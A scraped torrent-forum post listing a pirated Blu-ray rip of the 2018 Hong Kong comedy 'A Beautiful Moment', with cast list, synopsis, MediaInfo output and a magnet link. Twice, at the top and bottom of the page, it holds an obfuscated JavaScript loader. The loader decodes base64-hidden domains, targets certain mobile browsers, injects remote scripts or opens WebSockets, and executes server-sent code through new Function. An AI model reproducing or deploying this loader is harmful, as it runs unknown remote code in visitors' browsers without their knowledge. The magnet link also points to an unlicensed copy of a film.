重新爱你[国粤语配音/中文字幕].A.Beautiful.Moment.2018.1080p.BluRay.x265.10bit.DTS.2Audio 7.99GB

版主小s 29天前 222

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 重新爱你 / 百星贺囍2018 / 我的情敌女婿 / A Beautiful Moment

◎片 名 我的情敵女婿

◎年 代 2018

◎产 地 中国香港

◎类 别 喜剧 / 爱情

◎语 言 粤语 / 汉语普通话

◎上映日期 2018-02-16(中国香港)

◎IMDb链接 https://www.imdb.com/title/tt7779936/

◎豆瓣链接 https://movie.douban.com/subject/26995785/

◎片 长 109分钟

◎导 演 叶念琛 Patrick Kong (id:1274344)

◎编 剧 叶念琛 Patrick Kong (id:1274344)

潘幸枝 Ja Poon (id:1391538)

◎演 员 刘嘉玲 Carina Lau (id:1036905)

任达华 Simon Yam (id:1031194)

卫诗雅 Michelle Wai (id:1313357)

王菀之 Ivana Wong (id:1315465)

姜皓文 Philip Keung Ho-Man (id:1317884)

方力申 Lik-Sun Fong (id:1171687)

林盛斌 Shing-Ban Lam (id:1351653)

唐诗咏 Natalie Tong (id:1046958)

谢贤 Yin Tse (id:1025536)

容祖儿 Joey Yung (id:1019539)

欧阳靖 Jin Auyeung (id:1193019)

邓丽欣 Stephy Tang (id:1028496)

泳儿 Vincy Chan (id:1316323)

阮兆祥 Louis Yuen (id:1274951)

罗兰 Lan Law (id:1054340)

薛家燕 Nancy Sit (id:1312944)

鲍起静 Hee Ching Paw (id:1274229)

詹瑞文 Sui-man Chim (id:1304196)

邵音音 Yin-Yin Shaw (id:1297367)

谢君豪 Kwan-Ho Tse (id:1157914)

卢海鹏 Hoi-Pang Lo (id:1038772)

钟舒漫 Sherman Chung (id:1274529)

麦子乐 Bryant Ji-Lok Mak (id:1351652)

苏丽珊 Cecilia So (id:1352154)

麦明诗 Louisa Mak (id:1356458)

邓梓峰 Chi-Fung Tang (id:1320111)

张纹嘉 Crystal Cheung (id:1348763)

丁子朗 Karl Ting (id:1400256)

麦玲玲 Lingling Mak (id:1371988)

欧阳伟豪 Benjamin Au Yeung (id:1381302)

吴肇轩 Kenneth Woo (id:1353200)

黄心美 Scarlett Wong (id:1360088)

邵剑秋 Kim-Chau Shiu (id:1413263)

戴伟 Day Tai (id:1337786)

叶绍麒 Yip Shiu Kei (id:1408645)

◎标 签 香港 / 喜剧 / 贺岁 / 2018 / 叶念琛 / 爱情 / 搞笑 / 家庭

◎简 介

本片讲述了“心理治疗师”Dr.宝(刘嘉玲 饰)与两位女儿嘉欣(卫诗雅 饰)、嘉琪(王菀之 饰)以及嘉欣男友梁华生(任达华 饰)一家人之间姻差缘错、啼笑皆非的欢乐喜事。香港逾百位大牌艺人齐聚荧幕,狗年贺岁!

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 163555677187311442584551765064057486186 (0x7B0BAD78F5D588989B9788648DFDFB6A)

  4. Complete name : A[email protected]BBQDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 7.99 GiB

  8. Duration : 1 h 48 min

  9. Overall bit rate : 10.5 Mb/s

  10. Encoded date : UTC 2021-10-30 08:04:37

  11. Writing application : mkvmerge v56.1.0 ('My Friend') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@Main

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 1 h 48 min

  20. Bit rate : 7 432 kb/s

  21. Width : 1 920 pixels

  22. Height : 816 pixels

  23. Display aspect ratio : 2.35:1

  24. Frame rate mode : Constant

  25. Frame rate : 24.000 FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 10 bits

  29. Bits/(Pixel*Frame) : 0.198

  30. Stream size : 5.64 GiB (71%)

  31. Writing library : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  32. Encoding settings : rc=crf / crf=13.5000 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.90 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=9 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x816 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  33. Default : Yes

  34. Forced : No


  35. Audio #1

  36. ID : 2

  37. Format : DTS

  38. Format/Info : Digital Theater Systems

  39. Codec ID : A_DTS

  40. Duration : 1 h 48 min

  41. Bit rate mode : Constant

  42. Bit rate : 1 510 kb/s

  43. Channel(s) : 6 channels

  44. Channel layout : C L R Ls Rs LFE

  45. Sampling rate : 48.0 kHz

  46. Frame rate : 93.750 FPS (512 SPF)

  47. Bit depth : 24 bits

  48. Compression mode : Lossy

  49. Stream size : 1.15 GiB (14%)

  50. Title : Cantonese

  51. Language : Chinese

  52. Default : Yes

  53. Forced : No


  54. Audio #2

  55. ID : 3

  56. Format : DTS

  57. Format/Info : Digital Theater Systems

  58. Codec ID : A_DTS

  59. Duration : 1 h 48 min

  60. Bit rate mode : Constant

  61. Bit rate : 1 510 kb/s

  62. Channel(s) : 6 channels

  63. Channel layout : C L R Ls Rs LFE

  64. Sampling rate : 48.0 kHz

  65. Frame rate : 93.750 FPS (512 SPF)

  66. Bit depth : 24 bits

  67. Compression mode : Lossy

  68. Stream size : 1.15 GiB (14%)

  69. Title : Mandarin

  70. Language : Chinese

  71. Default : No

  72. Forced : No


  73. Text #1

  74. ID : 4

  75. ID in the original source medium : 4609 (0x1201)

  76. Format : PGS

  77. Muxing mode : zlib

  78. Codec ID : S_HDMV/PGS

  79. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  80. Duration : 1 h 47 min

  81. Bit rate : 53.7 kb/s

  82. Count of elements : 4029

  83. Stream size : 41.4 MiB (1%)

  84. Title : chs

  85. Language : Chinese

  86. Default : Yes

  87. Forced : No

  88. Original source medium : Blu-ray


  89. Text #2

  90. ID : 5

  91. ID in the original source medium : 4608 (0x1200)

  92. Format : PGS

  93. Muxing mode : zlib

  94. Codec ID : S_HDMV/PGS

  95. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  96. Duration : 1 h 47 min

  97. Bit rate : 57.4 kb/s

  98. Count of elements : 4029

  99. Stream size : 44.3 MiB (1%)

  100. Title : cht

  101. Language : Chinese

  102. Default : No

  103. Forced : No

  104. Original source medium : Blu-ray


  105. Text #3

  106. ID : 6

  107. ID in the original source medium : 4610 (0x1202)

  108. Format : PGS

  109. Muxing mode : zlib

  110. Codec ID : S_HDMV/PGS

  111. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  112. Duration : 1 h 47 min

  113. Bit rate : 57.5 kb/s

  114. Count of elements : 4007

  115. Stream size : 44.4 MiB (1%)

  116. Title : eng

  117. Language : English

  118. Default : No

  119. Forced : No

  120. Original source medium : Blu-ray


  121. Menu

  122. 00:00:00.000 : 第 01 章

  123. 00:07:45.708 : 第 02 章

  124. 00:11:28.791 : 第 03 章

  125. 00:15:01.750 : 第 04 章

  126. 00:24:31.791 : 第 05 章

  127. 00:30:41.250 : 第 06 章

  128. 00:36:31.041 : 第 07 章

  129. 00:42:30.916 : 第 08 章

  130. 00:49:10.333 : 第 09 章

  131. 00:53:31.208 : 第 10 章

  132. 00:57:26.250 : 第 11 章

  133. 01:03:16.250 : 第 12 章

  134. 01:10:48.125 : 第 13 章

  135. 01:15:39.958 : 第 14 章

  136. 01:22:15.708 : 第 15 章

  137. 01:31:14.541 : 第 16 章

  138. 01:35:20.333 : 第 17 章

  139. 01:40:45.458 : 第 18 章




复制代码


TAGS 喜剧 爱情

磁力链:
  • magnet:?xt=urn:btih:E3F4C5970B3FDD16D2B51FDA19F73BA19A30D417

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};